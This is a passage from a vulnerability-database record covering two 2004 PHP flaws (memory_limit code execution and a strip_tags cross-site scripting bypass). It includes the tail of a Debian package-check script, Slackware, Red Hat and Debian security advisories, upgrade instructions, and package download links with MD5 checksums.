reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-ldap\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-magick\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-mhash\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-mysql\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-snmp\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-cgi-xml\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-dev\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-doc\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-gd\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-imap\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-ldap\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-magick\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-mhash\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-mysql\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-snmp\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-xml\", reference:\"3.0.18-23.1woody2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:06", "bulletinFamily": "unix", "description": "New PHP packages are available for Slackware 8.1, 9.0, 9.1, 10.0, and -current\nto fix security issues (memory_limit handling and a problem in the strip_tags\nfunction). Sites using PHP should upgrade.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0594\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0595\n\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nTue Jul 20 19:35:16 PDT 2004\npatches/packages/php-4.3.8-i486-1.tgz: Upgraded to php-4.3.8.\n This release fixes two security problems in PHP (memory_limit handling and\n a problem in the strip_tags function). Sites using PHP should upgrade.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0594\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0595\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/php-4.3.8-i386-1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/php-4.3.8-i386-1.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/php-4.3.8-i486-1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/php-4.3.8-i486-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-4.3.8-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nc6734463934818904828833b9e5dce59 php-4.3.8-i386-1.tgz\n\nSlackware 9.0 package:\n73055c5395f4c60b7cf4bbdcfab17e72 php-4.3.8-i386-1.tgz\n\nSlackware 9.1 package:\ne2d3374f55e85a14a15ac267193ac55e php-4.3.8-i486-1.tgz\n\nSlackware 10.0 package:\n7dfa5a85e080d833ea21fcd81b166977 php-4.3.8-i486-1.tgz\n\nSlackware -current package:\n7dfa5a85e080d833ea21fcd81b166977 php-4.3.8-i486-1.tgz\n\n\nInstallation instructions:\n\nFirst, stop apache:\n > apachectl stop\n\nNext, upgrade to the new PHP package:\n > upgradepkg php-4.3.8-i486-1.tgz\n\nFinally, restart apache:\n > apachectl start", "modified": "2004-07-20T23:21:16", "published": "2004-07-20T23:21:16", "id": "SSA-2004-202-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.406480", "title": "PHP", "type": "slackware", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:33", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP server.\n\nStefan Esser discovered a flaw when memory_limit configuration setting is\nenabled in versions of PHP 4 before 4.3.8. If a remote attacker could\nforce the PHP interpreter to allocate more memory than the memory_limit\nsetting before script execution begins, then the attacker may be\nable to supply the contents of a PHP hash table remotely. This hash table\ncould then be used to execute arbitrary code as the 'apache' user. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0594 to this issue.\n\nThis issue may be exploitable if using the default PHP configuration with\nthe \"register_globals\" setting of \"On\". The Apache memory exhaustion bug,\nfixed in a previous update to Red Hat Enterprise Linux 3, may also allow\nthis PHP issue to be exploited; this Apache bug does not affect Red Hat\nEnterprise Linux 2.1.\n\nStefan Esser discovered a flaw in the strip_tags function in versions of\nPHP before 4.3.8. The strip_tags function is commonly used by PHP scripts\nto prevent Cross-Site-Scripting attacks by removing HTML tags from\nuser-supplied form data. By embedding NUL bytes into form data, HTML tags\ncan in some cases be passed intact through the strip_tags function, which\nmay allow a Cross-Site-Scripting attack. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-0595 to\nthis issue.\n\nAll users of PHP are advised to upgrade to these updated packages, which\ncontain backported patches that address these issues.", "modified": "2018-03-14T19:25:52", "published": "2004-07-19T04:00:00", "id": "RHSA-2004:395", "href": "https://access.redhat.com/errata/RHSA-2004:395", "type": "redhat", "title": "(RHSA-2004:395) php security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:26", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP server.\n\nStefan Esser discovered a flaw when memory_limit is enabled in versions of\nPHP 4 before 4.3.8. If a remote attacker could force the PHP interpreter to\nallocate more memory than the memory_limit setting before script execution\nbegins, then the attacker may be able to supply the contents of a PHP hash\ntable remotely. This hash table could then be used to execute arbitrary\ncode as the 'apache' user. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0594 to this issue.\n\nThis issue has a higher risk when PHP is running on an instance of Apache\nwhich is vulnerable to CAN-2004-0493. For Red Hat Enterprise Linux 3, this\nApache memory exhaustion issue was fixed by a previous update,\nRHSA-2004:342. It may also be possible to exploit this issue if using a\nnon-default PHP configuration with the \"register_defaults\" setting is\nchanged to \"On\". Red Hat does not believe that this flaw is exploitable in\nthe default configuration of Red Hat Enterprise Linux 3.\n\nStefan Esser discovered a flaw in the strip_tags function in versions of\nPHP before 4.3.8. The strip_tags function is commonly used by PHP scripts\nto prevent Cross-Site-Scripting attacks by removing HTML tags from\nuser-supplied form data. By embedding NUL bytes into form data, HTML tags\ncan in some cases be passed intact through the strip_tags function, which\nmay allow a Cross-Site-Scripting attack. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-0595 to\nthis issue. \n\nAll users of PHP are advised to upgrade to these updated packages, which\ncontain backported patches that address these issues.", "modified": "2017-07-29T20:35:20", "published": "2004-07-19T04:00:00", "id": "RHSA-2004:392", "href": "https://access.redhat.com/errata/RHSA-2004:392", "type": "redhat", "title": "(RHSA-2004:392) php security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-08-22T02:23:52", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 669-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 7th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php3\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE IDs : CAN-2004-0594 CAN-2004-0595\n\nTwo vulnerabilities have been discovered in php4 which also apply to\nthe version of php3 in the stable Debian distribution. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCAN-2004-0594\n\n The memory_limit functionality allows remote attackers to execute\n arbitrary code under certain circumstances.\n\nCAN-2004-0595\n\n The strip_tags function does not filter null (\\0) characters\n within tag names when restricting input to allowed tags, which\n allows dangerous tags to be processed by some web browsers which\n could lead to cross-site scripting (XSS) vulnerabilities.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 3.0.18-23.1woody2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 3.0.18-27.\n\nWe recommend that you upgrade your php3 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2.dsc\n Size/MD5 checksum: 1116 26d2596d5f0b00943c64584ee8ee444a\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2.diff.gz\n Size/MD5 checksum: 57115 ca74ee92c3b4c3b179444f6ec0054423\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18.orig.tar.gz\n Size/MD5 checksum: 2203818 da541ac71d951c47a011ceb26664ba2d\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php3/php3-doc_3.0.18-23.1woody2_all.deb\n Size/MD5 checksum: 987048 e6c638cbb9c84b167a7cbd9782d64098\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 401238 8586e692ca92764162cf70df945be846\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 617530 cbf6b0a9ef2f301dc59a0769e801be13\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 24064 d0493bb6e442116fdd18098d41ab6a2f\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 27672 dd99ce8d485ddb1e345dedbf69b2eceb\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 10914 2209f330a2f77d878e444bc15987f230\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 7604 b28c2026615f4d6170006ae608297d93\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 4218 dba4957a1d482b936e3aa85dfa0820b2\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 14506 dbe6e6412b36e9badda994258de64231\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 5948 3f14701a97ea40d6e2e83ec2b6412d1e\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 12746 297b502c13df047c7ac4da24466be329\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 50840 983ed84760361c2a0402c6e0b9a6bac6\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 24884 17dbcd3121e00c8bff739e4d2325c1c9\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 27144 bf228a0b2a88533cffce1babac760163\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 10630 fab8e0e96cfcb3c8ef955041a188aa31\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 7222 27893e346785c89a11664bea9ff2810a\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 4072 f9f317ecc111aaad3104ada4b1035a21\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 15596 9c43d18e06f351ebd9704876a23a0f91\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 5810 761957796d9ce6ef4bb7569744129aa5\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody1_alpha.deb\n Size/MD5 checksum: 12766 62de5aadb6748c521a6f82dccf6d43d1\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 372246 54e6492471c2d4cf969fc65f66330f8e\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 495224 2cb35679adf48b0b79d98a0a347982a8\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 20706 6c0adf50353899963b4a751a49171b67\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 26402 f88a4822308f63c604572538465f7819\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 9306 ebb7c052f926f8f8a6176365c366d2a9\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 7878 5839d2fd62cea07dd00fa7df32c45a50\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 3744 40564aed2670bda081cf8438875c407d\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 13554 9e69503375735d617e14014c57b58b9c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 5422 dba7181217ebc1e712c2bedbcc5687e4\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 11002 058d6185fe4e88910370b4274dc0648a\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 51080 fd17081cf67051fcc058a8868edad2ab\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 20344 7e3d5fcff6070c2bc4645365a0053c11\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 25702 c9ca45ea2fc8e40b3a206a0a5cb3556e\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 9066 19ef2d64010083b4d193a77481e59ef4\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 7624 1e0655e71afc169e7f09fe7b37d7c145\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 3642 e427adb5f2b3254bb9210aa4cf482fb6\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 12888 d13deb3e8952362d96d682db2a911b35\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 5602 7ef7c3ba993dc53531df006a7ffbfacb\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 10584 255aadd14a2f1467f7dc9abb34deecb0\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 362082 6787eeac8e9ac2e50e20bb801abe9253\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 461994 8bb9fa9c56ccdbb7d48eb4638829390b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 21108 944e87973aaffb473b051e18ca8eab0c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 24126 8e51b94efbda2899d713f47e58dfda02\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 9544 3234c38fe99650840159f6814b70a5db\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 6454 0a9234881aa6666c496f66c6a09f4257\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 3824 5abf21161298ae868fd1a6201fe78874\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 12894 72a89986a4a12997372b1d364c0d574a\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 5450 e87b64486722d602d071dbee4b217556\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 10840 a6b2633e6c626ee25d179f56da58825c\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 57762 29559e1ebf88f9ee1fc8b76d200cf205\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 20630 f727e144c936a6d34efcfc0a0ab8eee4\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 24026 2fc6d0fc417e3c3dacabff889844d7aa\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 9408 bc84679bc33f1c77bd5f9c6c2e583712\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 6346 37f8ef9c2d19723b5be934abc4562555\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 3746 9d119dea1307e02a5b0afea239142f75\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 12720 a26a1916a4be814b145bed6d7941afb0\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 5344 d2bf02ace4ca2b52778e91749a055380\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 10402 aa166d59f051adc53caffeb18793eb54\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 485120 b914af6b835bb16c0d9a9fe810b30e5a\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 753444 a08fc22b4b5674795cd003aa774d5e3b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 38204 db03d15559ca62f4f9ae95467c72f174\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 43172 8e6d8007e78bbbcbe6b9d047bb33145f\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 15644 fc1fa99906828af89ed744daf5d011a0\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 10192 f72e7a8ce4e9600fd62294449fed83b5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 5320 9ffe8ab166385be9ea7ccd0c94d5a387\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 21430 b5356cf24235b3baf94fd89eccb75e3e\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 7828 84979e0eadcf73ff800caed3b0cced45\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 18766 d2c8077fdb79619c7af8835d959890b8\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 51092 d079eb7c8e580db5429ca54eec143a5c\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 32824 365f80dcc939b945f3d6ba7d5d37a5cf\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 35288 f9bf561c764189ab2cfa968cde1db886\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 13342 bfaef446d2b5878845b2599c3f7d2550\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 9082 b139ef11d941c230af7325b424c10b5d\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 4788 565354fff0fa172025a204638a01734f\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 18824 db0055024384ddbafd6dfa2f67e8e9ad\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 7084 5947c5ffa7e56b11135a42fcc8bfb184\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 15928 936b88b0d8fb00c89a1b0eacadb23675\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 404544 b25239855c8fb96fb7019f1a126a3268\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 567692 94f94e2f5d8eff7c9969a4ff7aaf695c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 22986 c4ba449a797cc9d281a98829bdcf3c32\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 26800 9a6f3aa33e45a02ec7d2bfe9bfb98974\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 10464 d54ff9acd08f3a3eff97a200489e57cf\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 8468 155a39ec41356c590cc2e1c3742ba1e6\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 4198 511263c7b823d628f189cb923d35febc\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 14270 5dab735bdb79588c57c408263aa4d3ce\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 5768 18add6a8a4bdc8dfea49b4ba174f345f\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 12026 e911a78f07ab709997eade5312891d84\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 51096 f56a4597ec6261c5ab47cfb9b145193f\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 25206 af7957881c498351ebdbabda36bb25a9\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 28886 a6fbf83904468631b34bccbe75ac150a\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 11224 69627af6dcb77c1c508f1068b9508814\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 8778 7f0a61bd7a3cdbb42aabbae13ed7f82e\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 4224 6a0fdfc4fdfc8657af24cf9c38d3c0ae\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 14892 b2b22d3b8f15e26765e3718bdd0f8c2c\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 5858 57d7dae8b607e3b9eefdabf80ed6300d\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 12832 0ff973288f884888af76b3047c4b58db\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 357480 a974723dec64d38d8ab919dc10fd139c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 432828 c1403347a82ddc22f92f2868ab6be90c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 21404 8866c6f7ce61f193c9731422a608eb99\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 25254 6aed3ecf78a5a2c902ef4a2e53826e44\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 9528 fd95b5ce11a6a64310118d11e0240888\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 6686 58ee57694fb0c134eb8476fd964295c5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 3858 4df46c8427e27ecd71acb1be25a07972\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 13334 b893f8cc781c046e758bb25d3f816783\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 5460 1f2d266ba865af34d2fee5b38087f87f\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 11110 862848858a05fc7587a22c17dd35d0ae\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 51108 8b7a81cd09893562e4f8c917e4a668c6\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 20186 850fef527ae16661d8b13ad94b3f52d4\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 24812 5ad704e699f7dc3020a806e393551d67\n 